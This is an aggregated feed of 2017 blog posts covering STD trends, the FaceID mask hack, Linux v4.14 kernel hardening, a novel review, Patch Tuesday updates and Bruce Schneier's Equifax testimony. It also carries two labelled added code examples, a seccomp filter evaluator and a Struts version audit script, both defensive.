It is important to note that a big part of changes in disease rates is usually detection. Once you start looking for a condition, you’ll probably find more of it until enough diagnoses happen for treatment to bring the rates down. Up until 2000, the U.S. did pretty well in terms of declining rates for cases of gonorrhea and syphilis. Zoom in on the shaded area from 2000 to 2016, however, and you can see a pretty different story. These rates are up over the last 16 years, and chlamydia rates have been steadily increasing since the start of reporting in 1984.

STDs are fundamentally a social phenomenon, especially because they can spread through social networks. However, we have to be very careful not to jump to conclusions about the causes of these trends. It’s tempting to blame dating apps or hookup culture, for example, but early work at the state level finds only a mixed relationship between dating app use and STD rates, and young people also have higher rates of sexual inactivity. Rate increases could even be due in part to detection, now that more people have access to health coverage and care through the Affordable Care Act. Just don’t wait for peer review to finish before going to get tested!

Inspired by demographic facts you should know cold, “What’s Trending?” is a post series at Sociological Images featuring quick looks at what’s up, what’s down, and what sociologists have to say about it.

Evan Stewart is a Ph.D. candidate in sociology at the University of Minnesota. You can follow him on Twitter.

(View original at https://thesocietypages.org/socimages)

CryptogramApple FaceID Hacked

It only took a week:

On Friday, Vietnamese security firm Bkav released a blog post and video showing that -- by all appearances -- they'd cracked FaceID with a composite mask of 3-D-printed plastic, silicone, makeup, and simple paper cutouts, which in combination tricked an iPhone X into unlocking.

The article points out that the hack hasn't been independently confirmed, but I have no doubt it's true.

I don't think this is cause for alarm, though. Authentication will always be a trade-off between security and convenience. FaceID is another biometric option, and a good one. I wouldn't be less likely to use it because of this.

FAQ from the researchers.

Worse Than FailureThe For While Loop

Alex R. was the architect of a brand spanking new system that was to read inputs from numerous other internal systems, crunch a whole bunch of numbers, record everything in a database and spew forth a massive report file. He spent months designing the major details of the system, and more months designing the various sub-components. From all this came a variety of business-level data structures which spawned POJOs and the underlying DB tables to store assorted inputs, flags and outputs. He did a fairly thorough job of documenting all the interfaces, and provided detailed specifications for all of the next-level methods that were left as TBDs in the design.


The project manager then assigned units of work to numerous offshored junior developers who managed to get virtually everything wrong. If they couldn't understand what a spec required, they changed the spec to reflect what they actually wrote. This caused Alex to start versioning the requirements document in order to catch the changes by the junior developers so that they could be rolled back.

After a while, the number of junior-developer-caused issues was piling up and Alex suggested some training sessions on certain ways of doing things to reduce the chaff he had to deal with. Management turned him down because they couldn't afford to take developers off of coding tasks for purposes of training; there was a schedule to keep! The fact that oodles of time were being wasted on them building the wrong stuff, only to have why it was wrong explained and then have them go back and re-do it - sometimes 6 or 7 times - was irrelevant.

So how does one deal with idiotic management like this?

Alex thought that he had found a way to expose the problem and (hopefully) force something to be done. He would put in something (that any experienced developer should be able to spot as a simple code formatting issue) that the junior developers would never spot. The code would work correctly, but it would stymie them so that they had to first understand it before they could change it. He used the following coding style in a variety of locations throughout the codebase and waited:

  List<Widget> widgets;
  for (int i=0; i<limit; i++) {
      // Do stuff
  } while ((widgets = getWidgets()) == null);

For those not familiar with Java, a for-loop statement ends at its closing brace, so the while (expression); that follows it is a separate statement with an empty body, entirely unrelated to the for-loop. However, the junior developers didn't know this, and couldn't find any documentation on a for-while statement. Although they were able to create little test programs, they didn't understand how the while-expression controlled the for-loop (it doesn't). In this case, the underlying DAO either returned a populated list or threw an exception, so it was effectively while-false (the function call and assignment occurred exactly once) and was just syntactic nonsense that confused the junior developers.

They couldn't recognize a Java 101 code format issue and they were sufficiently stubborn that they refused to simply ask Alex what the code was doing. They were even foolish enough to openly discuss it amongst themselves on a conference line - agreeing not to ask for help until they figured it out - before a meeting with Alex and his boss began.

After 6 weeks of them floundering around on it, the offshore manager finally brought the issue up with Alex and his boss, at which time Alex explained what running the code formatter would show. He then pointed out that since they didn't know the basics of reading Java code and preferred to waste massive amounts of time rather than just asking about something they didn't understand, it was clear that they didn't have the wherewithal to make technical decisions on a larger scale, or change the design documents as they saw fit.

He continued to point out that until the junior developers showed marked improvements in their understanding of simple code, they should concentrate on learning to do basic programming instead of trying to be architects. To this end, he again offered to have ongoing training sessions where he would attempt to raise their skill level.

Of course management backed the cheap offshore labor. It was at this point that Alex realized it was a lost cause, so he fixed all the for-while snippets and updated the latest version of the detailed design document with a new opening paragraph:

  To Whomever Inherits This System:

  Detailed design documents were created by experienced people. Management decreed
  that junior developers could ignore them, at will and without penalty. The state
  of the code reflects this.
  
  Fair Warning!

Then he committed it, secure in the knowledge that the junior developers would never bother to look at it again once he was gone. Then he gave two weeks notice.


Planet DebianKees Cook: security things in Linux v4.14

Previously: v4.13.

Linux kernel v4.14 was released this last Sunday, and there’s a bunch of security things I think are interesting:

vmapped kernel stack on arm64
Similar to the same feature on x86, Mark Rutland and Ard Biesheuvel implemented CONFIG_VMAP_STACK for arm64, which moves the kernel stack to an isolated and guard-paged vmap area. With traditional stacks, there were two major risks when exhausting the stack: overwriting the thread_info structure (which contained the addr_limit field which is checked during copy_to/from_user()), and overwriting neighboring stacks (or other things allocated next to the stack). While arm64 previously moved its thread_info off the stack to deal with the former issue, this vmap change adds the last bit of protection by nature of the vmap guard pages. If the kernel tries to write past the end of the stack, it will hit the guard page and fault. (Testing for this is now possible via LKDTM’s STACK_GUARD_PAGE_LEADING/TRAILING tests.)

One aspect of the guard page protection that will need further attention (on all architectures) is that if the stack grew because of a giant Variable Length Array on the stack (effectively an implicit alloca() call), it might be possible to jump over the guard page entirely (as seen in the userspace Stack Clash attacks). Thankfully the use of VLAs is rare in the kernel. In the future, hopefully we’ll see the addition of PaX/grsecurity’s STACKLEAK plugin which, in addition to its primary purpose of clearing the kernel stack on return to userspace, makes sure stack expansion cannot skip over guard pages. This “stack probing” ability will likely also become directly available from the compiler as well.

set_fs() balance checking
Related to the addr_limit field mentioned above, another class of bug is finding a way to force the kernel into accidentally leaving addr_limit open to kernel memory through an unbalanced call to set_fs(). In some areas of the kernel, in order to reuse userspace routines (usually VFS or compat related), code will do something like: set_fs(KERNEL_DS); ...some code here...; set_fs(USER_DS);. When the USER_DS call goes missing (usually due to a buggy error path or exception), subsequent system calls can suddenly start writing into kernel memory via copy_to_user (where the “to user” really means “within the addr_limit range”).

Thomas Garnier implemented USER_DS checking at syscall exit time for x86, arm, and arm64. This means that a broken set_fs() setting will not extend beyond the buggy syscall that fails to set it back to USER_DS. Additionally, as part of the discussion on the best way to deal with this feature, Christoph Hellwig and Al Viro (and others) have been making extensive changes to avoid the need for set_fs() being used at all, which should greatly reduce the number of places where it might be possible to introduce such a bug in the future.

SLUB freelist hardening
A common class of heap attacks is overwriting the freelist pointers stored inline in the unallocated SLUB cache objects. PaX/grsecurity developed an inexpensive defense that XORs the freelist pointer with a global random value (and the storage address). Daniel Micay improved on this by using a per-cache random value, and I refactored the code a bit more. The resulting feature, enabled with CONFIG_SLAB_FREELIST_HARDENED, makes freelist pointer overwrites very hard to exploit unless an attacker has found a way to expose both the random value and the pointer location. This should render blind heap overflow bugs much more difficult to exploit.

Additionally, Alexander Popov implemented a simple double-free defense, similar to the “fasttop” check in the GNU C library, which will catch sequential free()s of the same pointer. (And has already uncovered a bug.)

Future work would be to provide similar metadata protections to the SLAB allocator (though SLAB doesn’t store its freelist within the individual unused objects, so it has a different set of exposures compared to SLUB).

setuid-exec stack limitation
Continuing the various additional defenses to protect against future problems related to userspace memory layout manipulation (as shown most recently in the Stack Clash attacks), I implemented an 8MiB stack limit for privileged (i.e. setuid) execs, inspired by a similar protection in grsecurity, after reworking the secureexec handling by LSMs. This complements the unconditional limit to the size of exec arguments that landed in v4.13.

randstruct automatic struct selection
While the bulk of the port of the randstruct gcc plugin from grsecurity landed in v4.13, the last of the work needed to enable automatic struct selection landed in v4.14. This means that the coverage of randomized structures, via CONFIG_GCC_PLUGIN_RANDSTRUCT, now includes one of the major targets of exploits: function pointer structures. Without knowing the build-randomized location of a callback pointer an attacker needs to overwrite in a structure, exploits become much less reliable.

structleak passed-by-reference variable initialization
Ard Biesheuvel enhanced the structleak gcc plugin to initialize all variables on the stack that are passed by reference when built with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL. Normally the compiler will yell if a variable is used before being initialized, but it silences this warning if the variable’s address is passed into a function call first, as it has no way to tell if the function did actually initialize the contents. So the plugin now zero-initializes such variables (if they hadn’t already been initialized) before the function call that takes their address. Enabling this feature has a small performance impact, but solves many stack content exposure flaws. (In fact at least one such flaw reported during the v4.15 development cycle was mitigated by this plugin.)

improved boot entropy
Laura Abbott and Daniel Micay improved early boot entropy available to the stack protector by both moving the stack protector setup later in the boot, and including the kernel command line in boot entropy collection (since with some devices it changes on each boot).

eBPF JIT for 32-bit ARM
The ARM BPF JIT had been around a while, but it didn’t support eBPF (and, as a result, did not provide constant value blinding, which meant it was exposed to being used by an attacker to build arbitrary machine code with BPF constant values). Shubham Bansal spent a bunch of time building a full eBPF JIT for 32-bit ARM which both speeds up eBPF and brings it up to date on JIT exploit defenses in the kernel.

seccomp improvements
Tyler Hicks addressed a long-standing deficiency in how seccomp could log action results. In addition to creating a way to mark a specific seccomp filter as needing to be logged with SECCOMP_FILTER_FLAG_LOG, he added a new action result, SECCOMP_RET_LOG. With these changes in place, it should be much easier for developers to inspect the results of seccomp filters, and for process launchers to generate logs for their child processes operating under a seccomp filter.

Additionally, I finally found a way to implement an often-requested feature for seccomp, which was to kill an entire process instead of just the offending thread. This was done by creating the SECCOMP_RET_ACTION_FULL mask (née SECCOMP_RET_ACTION) and implementing SECCOMP_RET_KILL_PROCESS.
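An added example (not from this post or the kernel tree) that builds a launcher-style seccomp policy using SECCOMP_RET_LOG and SECCOMP_RET_KILL_PROCESS and evaluates it with a tiny classic-BPF interpreter, so the verdict for a given syscall can be checked offline before the filter is ever installed; it also shows why SECCOMP_RET_ACTION_FULL had to replace the old mask. The constants are copied from the Linux UAPI headers, the syscall numbers assume x86_64, and the policy itself is constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Values copied from the Linux UAPI headers (linux/seccomp.h, linux/filter.h,
 * linux/audit.h) so the block builds without them; they are the v4.14 values. */
#define SECCOMP_RET_KILL_PROCESS 0x80000000U  /* new in v4.14: kill the whole process */
#define SECCOMP_RET_KILL_THREAD  0x00000000U  /* the old SECCOMP_RET_KILL */
#define SECCOMP_RET_LOG          0x7ffc0000U  /* new in v4.14: allow, but log */
#define SECCOMP_RET_ALLOW        0x7fff0000U
#define SECCOMP_RET_ACTION_FULL  0xffff0000U  /* new mask (née SECCOMP_RET_ACTION) */
#define SECCOMP_RET_ACTION       0x7fff0000U  /* old mask; cannot see bit 31 */
#define SECCOMP_FILTER_FLAG_LOG  (1UL << 1)    /* seccomp(2) flag: log this filter's actions */
#define AUDIT_ARCH_X86_64        0xc000003eU
#define BPF_LD  0x00
#define BPF_W   0x00
#define BPF_ABS 0x20
#define BPF_JMP 0x05
#define BPF_JEQ 0x10
#define BPF_K   0x00
#define BPF_RET 0x06

struct sock_filter { uint16_t code; uint8_t jt, jf; uint32_t k; };
struct seccomp_data { int32_t nr; uint32_t arch; uint64_t instruction_pointer; uint64_t args[6]; };
#define BPF_STMT(code, k)         { (uint16_t)(code), 0, 0, (uint32_t)(k) }
#define BPF_JUMP(code, k, jt, jf) { (uint16_t)(code), (jt), (jf), (uint32_t)(k) }

/* x86_64 syscall numbers used by the sample policy (assumed architecture). */
#define NR_PTRACE      101
#define NR_PERSONALITY 135

/* Sample policy (constructed): foreign-ABI calls and ptrace kill the whole process,
 * personality is allowed but logged, everything else is allowed silently. */
static const struct sock_filter policy[] = {
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, NR_PTRACE, 0, 1),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, NR_PERSONALITY, 0, 1),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_LOG),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};
#define POLICY_LEN (sizeof policy / sizeof policy[0])

/* Minimal classic-BPF evaluator for the three instruction forms the policy uses;
 * anything else, or running off the end, fails closed. */
uint32_t run_filter(const struct sock_filter *prog, size_t len, const struct seccomp_data *sd)
{
    uint32_t acc = 0;
    for (size_t pc = 0; pc < len; pc++) {
        const struct sock_filter *in = &prog[pc];
        switch (in->code) {
        case BPF_LD | BPF_W | BPF_ABS:           /* 32-bit load from seccomp_data at offset k */
            if (in->k + sizeof acc > sizeof *sd)
                return SECCOMP_RET_KILL_PROCESS;
            memcpy(&acc, (const char *)sd + in->k, sizeof acc);
            break;
        case BPF_JMP | BPF_JEQ | BPF_K:          /* skip jt instructions if equal, else jf */
            pc += (acc == in->k) ? in->jt : in->jf;
            break;
        case BPF_RET | BPF_K:
            return in->k;
        default:
            return SECCOMP_RET_KILL_PROCESS;
        }
    }
    return SECCOMP_RET_KILL_PROCESS;
}

/* Verdict the policy gives for one syscall number on one ABI. */
uint32_t verdict(int32_t nr, uint32_t arch)
{
    struct seccomp_data sd = { .nr = nr, .arch = arch };
    return run_filter(policy, POLICY_LEN, &sd);
}

/* Why the mask changed: the old mask strips bit 31, so a KILL_PROCESS verdict
 * would have looked exactly like the old KILL (thread) verdict. */
uint32_t action_old_mask(uint32_t ret)  { return ret & SECCOMP_RET_ACTION; }
uint32_t action_full_mask(uint32_t ret) { return ret & SECCOMP_RET_ACTION_FULL; }

/* Installing it for real (Linux 4.14+; deliberately not done here, so the example stays offline):
 *   struct sock_fprog prog = { POLICY_LEN, (struct sock_filter *)policy };
 *   prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
 *   syscall(SYS_seccomp, SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_LOG, &prog);
 */
```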

That’s it for now; please let me know if I missed anything. The v4.15 merge window is now open!

© 2017, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

Planet DebianRuss Allbery: Review: The Piper's Son

Review: The Piper's Son, by Melina Marchetta

Series: Francesca #2
Publisher: Candlewick Press
Copyright: 2010
Printing: 2011
ISBN: 0-7636-5458-2
Format: Kindle
Pages: 330

Tom Mackee's family has fallen apart. The impetus was the death of his uncle Joe in the London tube terrorist bombings, but that was only the start. He destroyed his chances with the only woman he really loved. His father's drinking got out of control, his mother left with his younger sister to live in a different city, and he refused to go with them and abandon his father. But then, six months later, his father abandoned him anyway. As this novel opens, Tom collapses while performing a music set, high on drugs and no sleep, and wakes up to discover his roommates have been fired from their jobs for stealing, and in turn have thrown him out of their apartment. He's at rock bottom.

The one place he can turn for a place to stay is his aunt Georgie, the second (although less frequent) viewpoint character of this book. She was the one who took the trip to the UK to try to find out what happened and retrieve her brother's body, and the one who had to return to Australia with nothing. Her life isn't in much better shape than Tom's. She's kept her job, but she's pregnant by her ex-boyfriend but barely talking to him, since he now has a son by another woman he met during their separation. And she's not even remotely over her grief.

The whole Finch/Mackee family is, in short, a disaster. But they have a few family relationships left that haven't broken, some underlying basic decency, and some patient and determined friends.

I should warn up-front, despite having read this book without knowing this, that this is a sequel to Saving Francesca, set five years later and focusing on secondary characters from the original novel. I've subsequently read that book as well, though, and I don't think reading it first is necessary. This is one of the rare books where being a sequel made it a better stand-alone novel. I never felt a gap of missing story, just a rich and deep background of friendships and previous relationships that felt realistic. People are embedded in networks of relationships even when they feel the most alone, and I really enjoyed seeing that surface in this book. All those patterns from Tom's past didn't feel like information I was missing. They felt like glimpses of what you'd see if you looked into any other person's life.

The plot summary above might make The Piper's Son sound like a depressing drama fest, but Marchetta made an excellent writing decision: the worst of this has already happened before the start of the book, and the rest is in the first chapter. This is not at all a book about horrible things happening to people. It's a book about healing. An authentic, prickly, angry healing that doesn't forget and doesn't turn into simple happily-ever-after stories, but does involve a lot of recognition that one has been an ass, and that it's possible to be less of an ass in the future, and maybe some things can be fixed.

A plot summary might fool you into thinking that this is a book about a boy and his father, or about dealing with a drunk you still love. It's not. The bright current under this whole story is not father-son bonding. It's female friendships. Marchetta pulls off a beautiful double-story, writing a book that's about Tom, and Georgie, and the layered guilt and tragedy of the Finch/Mackee family, but whose emotional heart is their friends. Francesca, Justine, absent Siobhan. Georgie's friend Lucia. Ned, the cook, and his interactions with Tom's friends. And Tara Finke, also mostly absent, but perfectly written into the story in letters and phone calls.

Marchetta never calls unnecessary attention to this, keeping the camera on Tom and Georgie, but the process of reading this book is a dawning realization of just how much work friendship is doing under the surface, how much back-channel conversation is happening off the page, and how much careful and thoughtful and determined work went into providing Tom a floor, a place to get his feet under him, and enough of a shove for him to pull himself together. Pulling that off requires a deft and subtle authorial touch, and I'm in awe at how well it worked.

This is a beautifully written novel. Marchetta never belabors an emotional point, sticking with a clear and spare description of actions and thoughts, with just the right sentences scattered here and there to expose the character's emotions. Tom's family is awful at communication, which is much of the reason why they start the book in the situation they're in, but Marchetta somehow manages to write that in a way that didn't just frustrate me or make me want to start banging their heads together. She somehow conveys the extent to which they're trying, even when they're failing, and adds just the right descriptions so that the reader can follow the wordless messages they send each other even when they can't manage to talk directly. I usually find it very hard to connect with people who can only communicate by doing things rather than saying them. It's a high compliment to the author that I felt I understood Tom and his family as well as I did.

One bit of warning: while this is not a story of a grand reunion with an alcoholic father where all is forgiven because family, thank heavens, there is an occasional wiggle in that direction. There is also a steady background assumption that one should always try to repair family relationships, and a few tangential notes about the Finches and Mackees that made me think there was a bit more abuse here than anyone involved wants to admit. I don't think the book is trying to make apologies for this, and instead is trying to walk the fine line of talking about realistically messed up families, but I also don't have a strong personal reaction to that type of story. If you have an aversion to "we should all get along because faaaaamily" stories, you may want to skip this book, or at least go in pre-warned.

That aside, the biggest challenge I had in reading this book was not breaking into tears. The emotional arc is just about perfect. Tom and Georgie never stay stuck in the same emotional cycle for too long, Marchetta does a wonderful job showing irritating characters from a slightly different angle and having them become much less irritating, and the interactions between Tom, Tara, and Francesca are just perfect. I don't remember reading another book that so beautifully captures that sensation of knowing that you've been a total ass, knowing that you need to stop, but realizing just how much work you're going to have to do, and how hard that work will be, once you own up to how much you fucked up. That point where you keep being an ass for a few moments longer, because stopping is going to hurt so much, but end up stopping anyway because you can't stand yourself any more. And stopping and making amends is hard and hurts badly, and yet somehow isn't quite as bad as you thought it was going to be.

This is really great stuff.

One final complaint, though: what is it with mainstream fiction and the total lack of denouement? I don't read very much mainstream fiction, but this is the second really good mainstream book I've read (after The Death of Bees) that hits its climax and then unceremoniously dumps the reader on the ground and disappears. Come back here! I wasn't done with these people! I don't need a long happily-ever-after story, but give me at least a handful of pages to be happy with the characters after crying with them for hours! ARGH.

But, that aside, the reader does get that climax, and it's note-perfect to the rest of the book. Everyone is still themselves, no one gets suddenly transformed, and yet everything is... better. It's the kind of book you can trust.

Highly, highly recommended.

Rating: 9 out of 10

Planet Linux AustraliaJames Morris: Save the Dates: Linux Security Summit Events for 2018

There will be a new European version of the Linux Security Summit for 2018, in addition to the established North American event.

The dates and locations are as follows:

Stay tuned for CFP announcements!


Krebs on SecurityAdobe, Microsoft Patch Critical Cracks

It’s Nov. 14 — the second Tuesday of the month (a.k.a. “Patch Tuesday”) — and Adobe and Microsoft have issued gobs of security updates for their software. Microsoft’s 11 patch bundles fix more than four-dozen security holes in various Windows versions and Office products — including at least four serious flaws that were publicly disclosed prior to today. Meanwhile, Adobe’s got security updates available for a slew of titles, including Flash Player, Photoshop, Reader and Shockwave.

Four of the vulnerabilities Microsoft fixed today have public exploits, but they do not appear to be used in any active malware campaigns, according to Gill Langston at security vendor Qualys. Perhaps the two most serious flaws likely to impact Windows end users involve vulnerabilities in Microsoft browsers Internet Explorer and Edge.

Qualys’ Langston reminds us that on last Patch Tuesday, Microsoft quietly released the fix for CVE-2017-13080, widely known as the KRACK vulnerability in WPA2 wireless protocol, but did not make it known until a week later, when the vulnerability was publicly disclosed. Check out the Qualys blog and this post from Ivanti for more on this month’s patches from Redmond. Otherwise, visit Windows Update sometime soon (click the Start/Windows button, then type Windows Update).

Adobe issued patches to fix at least 62 security vulnerabilities in its products, including several critical bugs in Adobe Flash Player and Reader/Acrobat. The Flash Player update brings the browser plugin to v. 27.0.0.187 on Windows, Mac, Linux and Chrome OS.

Windows users who browse the Web with anything other than Internet Explorer may need to apply the Flash patch twice, once with IE and again using the alternative browser (Firefox or Opera, for example).

Chrome and IE should auto-install the latest Flash version on browser restart, but users may need to manually check for updates and/or restart the browser before the new version is picked up.

When in doubt, click the vertical three dot icon to the right of the URL bar, select “Help,” then “About Chrome”: If there is an update available, Chrome should install it then. Chrome will replace that three dot icon with an up-arrow inside of a circle when updates are waiting to be installed.

Standard disclaimer: Because Flash remains such a security risk, I continue to encourage readers to remove or hobble Flash Player unless and until it is needed for a specific site or purpose. More on that approach (as well as slightly less radical solutions) can be found in A Month Without Adobe Flash Player. The short version is that you can probably get by without Flash installed and not miss it at all.

For readers still unwilling to cut the cord, there are half-measures that work almost as well. Fortunately, disabling Flash in Chrome is simple enough. Paste “chrome://settings/content” into a Chrome browser bar and then select “Flash” from the list of items. By default it should be set to “Ask first” before running Flash, although users also can disable Flash entirely here or whitelist and blacklist specific sites.

Another, perhaps less elegant, solution is to keep Flash installed in a browser that you don’t normally use, and then to only use that browser on sites that require it.

Planet DebianJonathan Dowland: WadC 2.2

Bird Cage, a WadC-generated map for Heretic

I have recently released version 2.2 of Wad Compiler, a lazy functional programming language and IDE for the construction of Doom maps.

The biggest change in this version is a reworking of the preferences system (to use the Java Preferences API), the wadcli command-line interface respecting preferences and a new preferences UI dialog (adapted from Quake Injector).

There are two new example maps: A Labyrinth demonstration contributed by "Yoruk", and a Heretic map Bird Cage by yours truly. These are both now amongst the largest examples in the collection, although laby.wl was generated by a higher-level program.

For more information see the release notes and the reference, or check out the new gallery of examples or skip straight to downloads.

I have no plans to work on WadC further (but never say never, I suppose.)

CryptogramLong Article on NSA and the Shadow Brokers

The New York Times just published a long article on the Shadow Brokers and their effects on NSA operations. Summary: it's been an operational disaster, the NSA still doesn't know who did it or how, and NSA morale has suffered considerably.

This is me on the Shadow Brokers from last May.

Worse Than FailureCodeSOD: One's Company

The more you learn about something, the less confident you often become in making statements about it, because you understand the complexities of the matter. If, for example, I asked you to help me refine my definition of how dates and times work, you know that many assumptions are wrong. Or if we tried to define what makes a string a person’s name, we’ll run into similar problems. This is even true for a value we’ve all probably seen implemented as a boolean value: gender. The more you learn about these subjects, the more complex and nuanced your understanding of them becomes. More and more, your answers start with, “It’s complicated…”.

Eugene was going through some code at a customer’s site, and he found that their business logic depended heavily on a flag ISCOMAPNY (sic), but there was no ISCOMPANY field anywhere in the database. There was, however, a SEX field on the customer records, implemented as an integer.

Digging through the queries, Eugene found a new approach to defining a company:

SELECT …,
    CASE ISNULL(c.SEX, '')
        WHEN '6' THEN '-1'
        WHEN '9' THEN '-1'
        ELSE '0'
    END AS ISCOMAPNY,
    …
FROM customers c
WHERE …

Like I said, it's complicated.


CryptogramMe on the Equifax Breach

Testimony and Statement for the Record of Bruce Schneier
Fellow and Lecturer, Belfer Center for Science and International Affairs, Harvard Kennedy School
Fellow, Berkman Center for Internet and Society at Harvard Law School

Hearing on "Securing Consumers' Credit Data in the Age of Digital Commerce"

Before the

Subcommittee on Digital Commerce and Consumer Protection
Committee on Energy and Commerce
United States House of Representatives

1 November 2017
2125 Rayburn House Office Building
Washington, DC 20515

Mister Chairman and Members of the Committee, thank you for the opportunity to testify today concerning the security of credit data. My name is Bruce Schneier, and I am a security technologist. For over 30 years I have studied the technologies of security and privacy. I have authored 13 books on these subjects, including Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World (Norton, 2015). My popular newsletter Crypto-Gram and my blog Schneier on Security are read by over 250,000 people.

Additionally, I am a Fellow and Lecturer at the Harvard Kennedy School of Government -- where I teach Internet security policy -- and a Fellow at the Berkman-Klein Center for Internet and Society at Harvard Law School. I am a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an advisory board member of Electronic Privacy Information Center and VerifiedVoting.org. I am also a special advisor to IBM Security and the Chief Technology Officer of IBM Resilient.

I am here representing none of those organizations, and speak only for myself based on my own expertise and experience.

I have eleven main points:

1. The Equifax breach was a serious security breach that puts millions of Americans at risk.

Equifax reported that 145.5 million US customers, about 44% of the population, were impacted by the breach. (That's the original 143 million plus the additional 2.5 million disclosed a month later.) The attackers got access to full names, Social Security numbers, birth dates, addresses, and driver's license numbers.

This is exactly the sort of information criminals can use to impersonate victims to banks, credit card companies, insurance companies, cell phone companies and other businesses vulnerable to fraud. As a result, all 143 million US victims are at greater risk of identity theft, and will remain at risk for years to come. And those who suffer identity theft will have problems for months, if not years, as they work to clean up their name and credit rating.

2. Equifax was solely at fault.

This was not a sophisticated attack. The security breach was a result of a vulnerability in the software for their websites: a program called Apache Struts. The particular vulnerability was fixed by Apache in a security patch that was made available on March 6, 2017. This was not a minor vulnerability; the computer press at the time called it "critical." Within days, it was being used by attackers to break into web servers. Equifax was notified by Apache, US CERT, and the Department of Homeland Security about the vulnerability, and was provided instructions to make the fix.

Two months later, Equifax had still failed to patch its systems. It eventually got around to it on July 29. The attackers used the vulnerability to access the company's databases and steal consumer information on May 13, over two months after Equifax should have patched the vulnerability.
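The timeline above turns on one question a build or operations team can answer mechanically: is the Struts 2 version we ship older than the one Apache fixed on March 6, 2017? The following Python script is an added example, not part of this testimony or of any Equifax tooling. It reads a constructed pom.xml fragment (a hypothetical project), resolves the `${struts.version}` property the way Maven does, and compares each `struts2-core` version with the first fixed release on its branch. The fixed versions (2.3.32 and 2.5.10.1) and the advisory identifiers (S2-045, CVE-2017-5638) are taken from the Apache advisory for that March 6 fix; the testimony itself does not name them.

```python
import re
import xml.etree.ElementTree as ET

# First fixed release on each Struts 2 branch for the flaw patched on
# March 6, 2017 (Apache advisory S2-045, CVE-2017-5638). Added here from the
# Apache advisory; the testimony above does not name these identifiers.
FIXED_IN = {
    (2, 3): (2, 3, 32),
    (2, 5): (2, 5, 10, 1),
}

MAVEN_NS = {"m": "http://maven.apache.org/POM/4.0.0"}

# Constructed pom.xml fragment (hypothetical project, not Equifax's). The Struts
# version is declared through a property, as most real builds do.
POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties>
    <struts.version>2.5.10</struts.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>${struts.version}</version>
    </dependency>
    <dependency>
      <groupId>org.apache.commons</groupId>
      <artifactId>commons-lang3</artifactId>
      <version>3.5</version>
    </dependency>
  </dependencies>
</project>
"""


def parse_version(version):
    """'2.5.10.1' -> (2, 5, 10, 1); a qualifier such as '-SNAPSHOT' is ignored."""
    core = re.split(r"[-+]", version, maxsplit=1)[0]
    return tuple(int(part) for part in core.split("."))


def is_vulnerable(version):
    """True if this struts2-core version predates the S2-045 fix on its branch."""
    parsed = parse_version(version)
    branch = parsed[:2]
    if branch in FIXED_IN:
        # Tuple comparison handles the four-part 2.5.10.1: (2, 5, 10) < (2, 5, 10, 1).
        return parsed < FIXED_IN[branch]
    # 2.x branches older than 2.3 never received the fix; later ones shipped with it.
    return branch < (2, 3)


def _properties(root):
    """Map of <properties> children, e.g. {'struts.version': '2.5.10'}."""
    props = root.find("m:properties", MAVEN_NS)
    if props is None:
        return {}
    return {child.tag.split("}")[-1]: (child.text or "").strip() for child in props}


def _resolve(version, props):
    """Expand a ${property} reference to its value from <properties>."""
    match = re.fullmatch(r"\$\{([^}]+)\}", version)
    return props.get(match.group(1), version) if match else version


def audit_pom(pom_xml):
    """Return [(resolved_version, vulnerable)] for every struts2-core dependency.

    vulnerable is None when the version is managed elsewhere (parent POM or
    BOM) and must be resolved before a verdict is possible.
    """
    root = ET.fromstring(pom_xml)
    props = _properties(root)
    results = []
    for dep in root.findall(".//m:dependency", MAVEN_NS):
        group = dep.findtext("m:groupId", default="", namespaces=MAVEN_NS)
        artifact = dep.findtext("m:artifactId", default="", namespaces=MAVEN_NS)
        if (group, artifact) != ("org.apache.struts", "struts2-core"):
            continue
        raw = dep.findtext("m:version", default="", namespaces=MAVEN_NS).strip()
        version = _resolve(raw, props)
        if not version or version.startswith("${"):
            results.append((version, None))
            continue
        results.append((version, is_vulnerable(version)))
    return results


if __name__ == "__main__":
    for version, vulnerable in audit_pom(POM):
        state = {True: "UNPATCHED", False: "ok", None: "unresolved"}[vulnerable]
        print(f"struts2-core {version}: {state}")
```

Run against the sample, the script reports `struts2-core 2.5.10: UNPATCHED`, because 2.5.10 sits one release below 2.5.10.1. The branch-aware comparison matters: a naive "is it newer than 2.3.32" check would wave through every 2.5.x build, including the vulnerable ones.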

The company's incident response after the breach was similarly damaging. It waited nearly six weeks before informing victims that their personal information had been stolen and they were at increased risk of identity theft. Equifax opened a website to help aid customers, but the poor security around that -- the site was at a domain separate from the Equifax domain -- invited fraudulent imitators and even more damage to victims. At one point, the official Equifax communications even directed people to that fraudulent site.

This is not the first time Equifax failed to take computer security seriously. It confessed to another data leak in January 2017. In May 2016, one of its websites was hacked, resulting in 430,000 people having their personal information stolen. Also in 2016, a security researcher found and reported a basic security vulnerability in its main website. And in 2014, the company reported yet another security breach of consumer information. There are more.

3. There are thousands of data brokers with similarly intimate information, similarly at risk.

Equifax is more than a credit reporting agency. It's a data broker. It collects information about all of us, analyzes it all, and then sells those insights. It might be one of the biggest, but there are 2,500 to 4,000 other data brokers that are collecting, storing, and selling information about us -- almost all of them companies you've never heard of and have no business relationship with.

